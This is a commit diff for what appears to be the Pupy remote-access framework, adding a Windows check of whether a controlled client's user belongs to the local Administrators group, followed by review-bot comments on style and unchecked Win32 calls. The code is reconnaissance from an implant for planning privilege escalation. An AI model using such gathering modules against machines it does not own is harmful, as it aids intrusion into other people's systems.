Shows if user is in local admin grp in get_info module
This commit is contained in:
parent
6dd52fbbe7
commit
df59c0e101
|
@ -6,6 +6,7 @@ __class_name__="GetInfo"
|
|||
@config(cat="gather")
|
||||
class GetInfo(PupyModule):
|
||||
""" get some informations about one or multiple clients """
|
||||
dependencies=["psutil", "pupwinutils.security"]
|
||||
def init_argparse(self):
|
||||
self.arg_parser = PupyArgumentParser(prog='get_info', description=self.__doc__)
|
||||
#self.arg_parser.add_argument('arguments', nargs='+', metavar='<command>')
|
||||
|
@ -21,6 +22,14 @@ class GetInfo(PupyModule):
|
|||
if self.client.is_windows():
|
||||
for k in windKeys:
|
||||
infos+="{:<10}: {}\n".format(k,self.client.desc[k])
|
||||
currentUserIsLocalAdmin = self.client.conn.modules["pupwinutils.security"].can_get_admin_access()
|
||||
desc = "local_adm"
|
||||
if currentUserIsLocalAdmin == True:
|
||||
infos+="{:<10}: {}\n".format(desc,"Yes")
|
||||
elif currentUserIsLocalAdmin == False:
|
||||
infos+="{:<10}: {}\n".format(desc,"No")
|
||||
else:
|
||||
infos+="{:<10}: {}\n".format(desc,"?")
|
||||
elif self.client.is_linux():
|
||||
for k in linuxKeys:
|
||||
infos+="{:<10}: {}\n".format(k,self.client.desc[k])
|
||||
|
|
|
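Review bot: The new tri-state test `if currentUserIsLocalAdmin == True:` / `elif currentUserIsLocalAdmin == False:` / `else:` spells out three nearly identical `infos+=` lines; a lookup keeps the `?` fallback for the `None` the helper returns on error and reads more directly: `infos+="{:<10}: {}\n".format(desc, {True: "Yes", False: "No"}.get(currentUserIsLocalAdmin, "?"))`, assuming the remote call returns a plain bool/None rather than a proxy. Because the value comes back over `self.client.conn`, `==` or a dict lookup is the right comparison here rather than `is True`, which need not hold for a proxied object. A comment above the call would help readers interpret the field, e.g. `# local_adm: whether the client's token (or its UAC linked token) is in the local Administrators group; not the same as "currently elevated"`. The enclosing method starts outside the hunk.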
@ -473,3 +473,62 @@ def get_currents_privs():
|
|||
privileges = ctypes.cast(buffer, ctypes.POINTER(TOKEN_PRIVS)).contents
|
||||
return privileges
|
||||
|
||||
def can_get_admin_access():
|
||||
"""
|
||||
Check if the user may be able to get administrator access.
|
||||
Returns True if the user is in the administrator's group.
|
||||
Otherwise returns False
|
||||
"""
|
||||
SECURITY_MAX_SID_SIZE = 68
|
||||
WinBuiltinAdministratorsSid = 26
|
||||
ERROR_NO_SUCH_LOGON_SESSION = 1312
|
||||
ERROR_PRIVILEGE_NOT_HELD = 1314
|
||||
TokenLinkedToken = 19
|
||||
# On XP or lower this is equivalent to has_root()
|
||||
if sys.getwindowsversion()[0] < 6:
|
||||
return bool(ctypes.windll.shell32.IsUserAnAdmin())
|
||||
# On Vista or higher, there's the whole UAC token-splitting thing.
|
||||
# Many thanks for Junfeng Zhang for the workflow: htttp://blogs.msdn.com/junfeng/archive/2007/01/26/how-to-tell-if-the-current-user-is-in-administrators-group-programmatically.aspx
|
||||
proc = ctypes.windll.kernel32.GetCurrentProcess()
|
||||
# Get the token for the current process.
|
||||
try:
|
||||
token = ctypes.wintypes.HANDLE()
|
||||
ctypes.windll.advapi32.OpenProcessToken(proc,TOKEN_QUERY,byref(token))
|
||||
try:
|
||||
# Get the administrators SID.
|
||||
sid = ctypes.create_string_buffer(SECURITY_MAX_SID_SIZE)
|
||||
sz = ctypes.wintypes.DWORD(SECURITY_MAX_SID_SIZE)
|
||||
target_sid = WinBuiltinAdministratorsSid
|
||||
ctypes.windll.advapi32.CreateWellKnownSid(target_sid,None,byref(sid),byref(sz))
|
||||
# Check whether the token has that SID directly.
|
||||
has_admin = ctypes.wintypes.BOOL()
|
||||
ctypes.windll.advapi32.CheckTokenMembership(None,byref(sid),byref(has_admin))
|
||||
if has_admin.value:
|
||||
return True
|
||||
# Get the linked token. Failure may mean no linked token.
|
||||
lToken = ctypes.wintypes.HANDLE()
|
||||
try:
|
||||
cls = TokenLinkedToken
|
||||
ctypes.windll.advapi32.GetTokenInformation(token,cls,byref(lToken),sizeof(lToken),byref(sz))
|
||||
except WindowsError, e:
|
||||
if e.winerror == ERROR_NO_SUCH_LOGON_SESSION:
|
||||
return False
|
||||
elif e.winerror == ERROR_PRIVILEGE_NOT_HELD:
|
||||
return False
|
||||
else:
|
||||
raise
|
||||
# Check if the linked token has the admin SID
|
||||
try:
|
||||
ctypes.windll.advapi32.CheckTokenMembership(lToken,byref(sid),byref(has_admin))
|
||||
return bool(has_admin.value)
|
||||
finally:
|
||||
ctypes.windll.kernel32.CloseHandle(lToken)
|
||||
finally:
|
||||
ctypes.windll.kernel32.CloseHandle(token)
|
||||
except Exception,e:
|
||||
return None
|
||||
finally:
|
||||
try:
|
||||
ctypes.windll.kernel32.CloseHandle(proc)
|
||||
except Exception,e:
|
||||
pass
|
||||
|
|
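Review bot: None of the advapi32 return values in `can_get_admin_access` are checked, and because `ctypes.windll` calls do not raise on a failed Win32 call, the `except WindowsError, e:` branch around `GetTokenInformation` is dead code: when the linked-token query fails, `lToken` stays a NULL handle and the second `CheckTokenMembership` silently re-checks the calling thread's own token instead of the linked one, so the function can answer `False` without ever having examined the linked token, and a failed `OpenProcessToken` or `CreateWellKnownSid` likewise goes unnoticed. Load advapi32 with `use_last_error=True`, test each BOOL result and map `ctypes.get_last_error()` to the two expected codes as below; the same check belongs on `CreateWellKnownSid` and both `CheckTokenMembership` calls, and a raise there still lands in the existing `except Exception,e: return None`, which get_info renders as `?`. `CloseHandle(proc)` on the pseudo-handle from `GetCurrentProcess()` is a no-op and can go along with its bare `except Exception,e: pass`. The comment URL also has a typo (`htttp://`).
```python
def can_get_admin_access():
    advapi32 = ctypes.WinDLL('advapi32', use_last_error=True)
    # … unchanged: constants, XP fallback, GetCurrentProcess …
    if not advapi32.OpenProcessToken(proc, TOKEN_QUERY, byref(token)):
        raise ctypes.WinError(ctypes.get_last_error())
    # … unchanged: CreateWellKnownSid, first CheckTokenMembership …
    lToken = ctypes.wintypes.HANDLE()
    if not advapi32.GetTokenInformation(token, TokenLinkedToken, byref(lToken), sizeof(lToken), byref(sz)):
        err = ctypes.get_last_error()
        # no linked token (not a UAC-split session) or not allowed to query it
        if err in (ERROR_NO_SUCH_LOGON_SESSION, ERROR_PRIVILEGE_NOT_HELD):
            return False
        raise ctypes.WinError(err)
    # … unchanged: CheckTokenMembership on lToken, CloseHandle cleanup …
```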